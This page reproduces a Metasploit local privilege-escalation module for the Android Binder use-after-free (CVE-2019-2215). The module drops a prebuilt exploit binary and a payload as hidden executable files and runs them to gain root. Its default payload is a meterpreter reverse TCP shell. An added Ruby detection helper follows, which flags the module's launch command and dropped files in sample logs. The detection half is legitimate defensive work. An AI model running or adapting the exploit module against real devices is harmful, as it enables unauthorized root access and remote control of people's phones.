
67 lines
No EOL
2.3 KiB
Ruby
Executable file
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Common
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super( update_info( info, {
      'Name'           => "Android Binder Use-After-Free Exploit",
      'Description'    => %q{
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Jann Horn',    # discovery and exploit
        'Maddie Stone', # discovery and exploit
        'grant-h',      # Qu1ckR00t
        'timwr',        # metasploit module
      ],
      'References'     => [
        [ 'CVE', '2019-2215' ],
        [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1942' ],
        [ 'URL', 'https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/' ],
        [ 'URL', 'https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c' ],
      ],
      'DisclosureDate' => "Sep 26 2019",
      'SessionTypes'   => [ 'meterpreter' ],
      'Platform'       => [ "android", "linux" ],
      'Arch'           => [ ARCH_AARCH64 ],
      'Targets'        => [[ 'Auto', {} ]],
      'DefaultOptions' =>
        {
          'PAYLOAD'  => 'linux/aarch64/meterpreter/reverse_tcp',
          'WfsDelay' => 5,
        },
      'DefaultTarget'  => 0,
    }
    ))
  end

  # Write data to path on the target, mark it executable and register it so
  # FileDropper removes it when the session is cleaned up.
  def upload_and_chmodx(path, data)
    write_file path, data
    chmod(path)
    register_file_for_cleanup(path)
  end

  def exploit
    # Prebuilt native exploit binary shipped with the framework's data files.
    local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2019-2215", "exploit" )
    exploit_data = File.read(local_file, {:mode => 'rb'})

    # Both the exploit binary and the payload are dropped as hidden files with
    # random five-letter names in the session's current working directory.
    workingdir = session.fs.dir.getwd
    exploit_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
    upload_and_chmodx(exploit_file, exploit_data)
    payload_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
    upload_and_chmodx(payload_file, generate_payload_exe)

    # The command that backgrounds the payload is piped to the exploit
    # binary's standard input; its output is echoed back to the operator.
    print_status("Executing exploit '#{exploit_file}'")
    result = cmd_exec("echo '#{payload_file} &' | #{exploit_file}")
    print_status("Exploit result:\n#{result}")
  end
end
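The module above leaves two recognisable host artifacts: a pair of hidden, executable files named "." followed by five random lowercase letters in the session's working directory, and a shell command of the exact shape `echo '<payload> &' | <exploit>`. The following is an added detection helper written for this page; it is not part of the Metasploit module or the framework. The log format (`<pid> <ppid> <cmdline>`), the directory entries and every path in it are constructed sample data.

```ruby
# Added example (not from the Metasploit module above): flag the on-host
# artifacts that the CVE-2019-2215 module produces when it runs.
#
# The module names both dropped files "." + Rex::Text.rand_text_alpha_lower(5),
# marks them executable, and launches them with
#   echo '<payload_file> &' | <exploit_file>
# Both checks below key on those two facts. All inputs here are constructed.

# Exact command shape used by the module's cmd_exec call: two absolute paths,
# each ending in a hidden five-lowercase-letter file name.
EXEC_PATTERN = %r{\Aecho '(?<payload>/\S*/\.[a-z]{5}) &' \| (?<exploit>/\S*/\.[a-z]{5})\z}

# Hidden file name of exactly five lowercase letters.
HIDDEN_NAME = /\A\.[a-z]{5}\z/

# Scan process-execution log lines of the (assumed) form "<pid> <ppid> <cmdline>"
# and return one hash per line whose command line matches EXEC_PATTERN.
def find_exploit_launches(log_lines)
  hits = []
  log_lines.each do |line|
    pid, ppid, cmd = line.strip.split(' ', 3)
    next if cmd.nil?
    m = EXEC_PATTERN.match(cmd.strip)
    next if m.nil?
    hits << { pid: pid.to_i, ppid: ppid.to_i, exploit: m[:exploit], payload: m[:payload] }
  end
  hits
end

# Given directory entries as { name:, mode: } (mode as an octal permission
# integer), return the names that look like the module's dropped files:
# hidden, five lowercase letters, and at least one execute bit set.
def suspicious_hidden_executables(entries)
  entries.select { |e| e[:name] =~ HIDDEN_NAME && (e[:mode] & 0o111) != 0 }
         .map { |e| e[:name] }
end

# Constructed sample data: one matching launch among unrelated commands, and a
# listing with the two dropped files beside benign entries.
SAMPLE_EXEC_LOG = [
  "1201 1100 /system/bin/sh -c id",
  "1345 1100 echo '/data/local/tmp/.kqzwe &' | /data/local/tmp/.xmvbp",
  "1402 1100 echo 'hello' | cat",
  "1500 1100 /data/local/tmp/.shortname",
].freeze

SAMPLE_DIR = [
  { name: ".kqzwe",    mode: 0o755 },
  { name: ".xmvbp",    mode: 0o755 },
  { name: ".cache",    mode: 0o644 },
  { name: ".abcde",    mode: 0o644 }, # right name shape, but not executable
  { name: "notes.txt", mode: 0o644 },
].freeze

if __FILE__ == $PROGRAM_NAME
  find_exploit_launches(SAMPLE_EXEC_LOG).each do |h|
    puts "pid #{h[:pid]} ran exploit #{h[:exploit]} with payload #{h[:payload]}"
  end
  puts "suspicious hidden executables: #{suspicious_hidden_executables(SAMPLE_DIR).join(', ')}"
end
```

Real process-execution telemetry usually records the command wrapped in a shell (`sh -c '...'`), so strip that wrapper before applying `EXEC_PATTERN`; and because the file names are random, the directory check is only a triage signal and should be confirmed by hashing the flagged files.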